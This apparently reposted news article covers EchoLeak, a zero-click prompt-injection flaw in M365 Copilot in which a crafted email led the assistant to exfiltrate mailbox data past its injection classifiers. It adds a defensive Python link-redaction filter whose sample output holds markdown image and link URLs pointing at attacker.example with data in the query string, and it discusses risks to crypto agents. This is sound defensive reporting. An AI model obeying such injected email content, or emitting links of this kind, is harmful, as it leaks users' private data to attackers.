Source: cryptobriefing.com

Microsoft patches critical vulnerability in M365 Copilot that allowed silent data theft

Microsoft patched a critical vulnerability in M365 Copilot, tracked as CVE-2025-32711 and dubbed EchoLeak, that allowed attackers to steal sensitive data including 2FA codes via a single malicious email without user interaction. Discovered by Aim Security and disclosed in January 2025, the server-side fix was deployed by May 2025 with no known exploitation before the patch. The flaw highlights ongoing prompt injection risks in AI systems, with implications for crypto and Web3 integrations.

Published Jun 16, 2026 · 3 min read

A single malicious email could exfiltrate 2FA codes, documents, and chat histories from Microsoft 365 Copilot without any user interaction.

Microsoft quietly fixed a vulnerability rated maximum critical in its M365 Copilot AI platform last Tuesday. The flaw, discovered by security firm Aim Security, allowed attackers to steal sensitive data, including two-factor authentication codes, from emails accessible to Copilot using nothing more than a single carefully crafted message.

The vulnerability, tracked as CVE-2025-32711 and dubbed “EchoLeak,” carried a CVSS severity score of 9.3 out of 10.

How EchoLeak worked

The attack required zero clicks from the victim. An attacker could send a malicious email that, when processed by Copilot, would trick the AI into exfiltrating organizational data: emails, documents, chat histories, the works. The proof-of-concept exploit demonstrated by Aim Security showed automatic data theft triggered simply by Copilot summarizing or interacting with the poisoned message.

The attack bypassed Microsoft’s existing defenses, including cross-prompt injection classifiers and external link redactions.

Aim Security discovered and responsibly disclosed the vulnerability to Microsoft in January 2025. Microsoft deployed server-side fixes by May 2025, meaning no customer action was required. The company confirmed it had no awareness of any affected customers or malicious exploitation before the patch was applied.

Public disclosure of the vulnerability began emerging around June 11-12, with the researchers revealing their proof-of-concept exploit on Monday.

A recurring pattern in AI security

The fundamental architecture of LLMs, which process all text in a unified context window, makes it extraordinarily difficult to enforce a security boundary between trusted instructions and untrusted data. Microsoft 365 Copilot integrates large language models with enterprise data sources through Retrieval-Augmented Generation (RAG), and the EchoLeak vulnerability demonstrated how attacker-controlled content in a user’s mailbox could manipulate Copilot into unauthorized disclosures without any user action.

The zero-click nature of the attack makes it particularly concerning for enterprise environments. Organizations deploying M365 Copilot across thousands of employees were potentially exposed without any single user needing to make a mistake. The attack surface was simply “receiving an email.”
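
Because the model cannot reliably tell instructions from data on the way in, one control that does not depend on the model is to filter what it sends out. The following is an added example, not Microsoft's or Aim Security's code: an allow-list form of the external link redaction mentioned above, applied to markdown model output. The host names and the sample response are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this tenant lets assistant output link to (constructed values).
ALLOWED_HOSTS = {"contoso.sharepoint.com", "learn.microsoft.com"}

# One pattern per place a URL can sit in markdown output.
INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")  # [t](url), ![alt](url)
REFDEF = re.compile(r"^ {0,3}\[[^\]]+\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.M)  # [label]: url
BARE = re.compile(r"\bhttps?://[^\s<>)\]]+", re.I)

def host_allowed(url):
    """True only for http(s) URLs whose host is exactly on the allow-list."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    host = (parts.hostname or "").lower()
    return parts.scheme in ("http", "https") and host in ALLOWED_HOSTS

def redact_external(markdown):
    """Return (clean_text, removed_urls) for one model response."""
    removed = []

    def keep_or_drop(url, original, replacement):
        if host_allowed(url):
            return original
        removed.append(url)
        return replacement

    # Inline links keep their visible text; images are dropped outright because
    # a renderer fetches them without a click.
    out = INLINE.sub(lambda m: keep_or_drop(
        m.group(3), m.group(0), "[image removed]" if m.group(1) else m.group(2)), markdown)
    # Removing a reference definition leaves [text][label] to render as plain text.
    out = REFDEF.sub(lambda m: keep_or_drop(m.group(1), m.group(0), ""), out)
    out = BARE.sub(lambda m: keep_or_drop(m.group(0), m.group(0), "[link removed]"), out)
    return out, removed

# Constructed model output, not taken from the EchoLeak proof of concept.
SAMPLE = (
    "The Q3 deck is at [Q3 deck](https://contoso.sharepoint.com/q3).\n"
    "![status](https://attacker.example/p.png?d=sample)\n"
    "See [details][ref] or https://attacker.example/x for more.\n"
    "\n"
    "[ref]: https://attacker.example/c?d=sample\n"
)

if __name__ == "__main__":
    clean, removed = redact_external(SAMPLE)
    print(clean)
    print("removed:", removed)
```

The returned list of removed URLs is worth logging per response: a run of redactions that all point at one unfamiliar host is a useful detection signal.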

What this means for crypto and Web3

The crypto industry has been rapidly integrating AI agents into its infrastructure. On-chain AI agents, automated trading bots, AI-powered wallet interfaces, and large language model integrations for DeFi protocols are proliferating. Every one of these implementations faces the same fundamental prompt injection problem that EchoLeak exploited.

If an AI agent managing on-chain transactions can be tricked into following malicious instructions embedded in data it processes, the consequences extend beyond data exfiltration to direct financial loss, including the ability to move funds, sign transactions, or interact with smart contracts. In crypto, where code is often open source and transactions are irreversible, the window between discovery and exploitation tends to be much narrower than in enterprise environments where responsible disclosure and rapid patching contained EchoLeak’s impact.

Disclosure: This article was edited by Editorial Team. For more information on how we create and review content, see our Editorial Policy.
